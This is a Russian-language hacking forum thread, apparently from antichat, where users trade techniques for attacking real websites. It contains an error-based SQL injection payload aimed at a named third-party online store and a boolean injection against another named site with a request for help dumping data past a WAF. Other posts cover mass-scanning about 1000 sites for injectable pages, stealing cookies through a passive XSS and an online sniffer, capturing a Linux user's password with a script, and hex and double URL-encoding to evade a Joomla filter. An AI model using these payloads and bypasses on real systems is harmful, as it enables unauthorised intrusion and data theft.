вряд ли будет готовое решение: случай индивидуальный, плюс, такое пишется довольно быстро можешь отписать мне в жабу, разберемся, либо посмотри сам, там не особо сложный скрипт выйдет.
Вот как пример скрипта: https://forum.antichat.ru/showpost.php?p=3739236&postcount=6 тебе только остается написать цикл под свой случай! Бывает попадаются такие уязвимости, что не один софт не возьмет из широко используемых в паблике, приходится писать самим скрипты для автоматизации.
С проверкой наличия SQL-injection всё очень сложно. Инъекции бывают очень разные. Многое зависит от цели - аудит типа black-box конкретного ресурса, проверка списка URL. Во втором случае будет целесообразнее покрыть N% возможных случаев парой запросов, чем приближаться к 99% используя сотни запросов и большой анализатор. В первом случае на хороший алгоритм нужны сотни человеко-часов. Или даже тысячи. Можете посмотреть на sqlmap - это самое популярное ПО в этой области. Однако даже оно, бывает, не может определить наличие инъекции, которую профессионал возьмет за 5 минут. Даже если у вас будет разработка, намного превосходящая sqlmap по эффективности, вы не сможете раскрутить часть инъекций и правильно интерпретировать информацию, т.к. если бы вы могли это сделать - вы бы не задавали этот вопрос. Для второго случая просто не изобретайте велосипед - все уже есть. Программ - множество, половина с открытыми исходными кодами. Для первого предлагаю почитать статьи по инъекциям. Разбирать инъекции, рассматривать возможные WAF. Может быть тогда вы сможете подойти к вопросу серьезно.
спасибо за ответ, сделал по-своему. погрешность получилась довольно большая, из списка в 1000 сайтов после ручной проверки нашлось порядка 370+ уязвимых сайтов. скрипт ошибочно определяет на 180+ больше. делал с помощью алгоритма diff, для моих задач этого было достаточно. цель стояла определить, но не раскрутить. P. S. все цифры приблизительны, я тоже мог много упустить, учитывая мой небольшой опыт
писал для себя тоже подобный чекер, вся сложность в том, что при ковычке к примеру, меняется какая-то область сайта, я делал так, +and(1=1)--+ и так несколько раз, естественно меняя 1=1, тк в странице могут быть часы, банеры и тн, которые постонно меняются! Но даже он не дал 100% результата!
Доброго времени суток. Нашёл на сайте пассивную XSS, зарегался. С онлайн снифера взял ссылку на картинку, составил запрос, сам перешёл по ссылке, но на снифере логов нету. Может ли быть, что браузер не даёт отправиться кукам? JavaScript включён.
HTML: http://www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180' Можно что нибудт придумать в limit?
www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY (SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))))+--+
всем привет что это за вид уязвимости такой ? как он называется ? нашёл видео - которое показывает такой метод, на укозе правда, но если он действует в разных ситуациях: https://www.youtube.com/watch?v=0I5FnjP_m0U я таким образом удалил основной email Логин в панели управления доменом https://ru.domaincontext.com - который по идеи не удаляется
Реально ли сделать так, чтобы если кто-то в консоли linux запустил bash-скрипт или программу, то этот скрипт сохранил бы пароль текущего юзера куда-нибудь в файл? Или что можно сделать, чтобы получить пароль таким образом?
Code: ht tp://w ww.vijp hoto.com/ind ex2.php?catid=47' AN D 1989=198 9 AN D 'IhRi'='IhRi не получается слить инфу скулмапом, т.к. получаю постоянно 406 Not Acceptable. Что-то вроде waf. Как обойти? Помогите плиз, оч важно
часто бывает в джумле стоит какой-то модуль для защиты от sql инъекций. определил что реагирует на "jos". если оно встречается, то появляется: пробовал шаманить - ничего не получилось. мб подскажет кто как можно обойти ?)
HEX, URL-encode, Double URL-encode Смотря в каком месте select * from %6aos_users select * from %256aos_users select * from information_schema.table where table_name=0x6a6f735f7573657273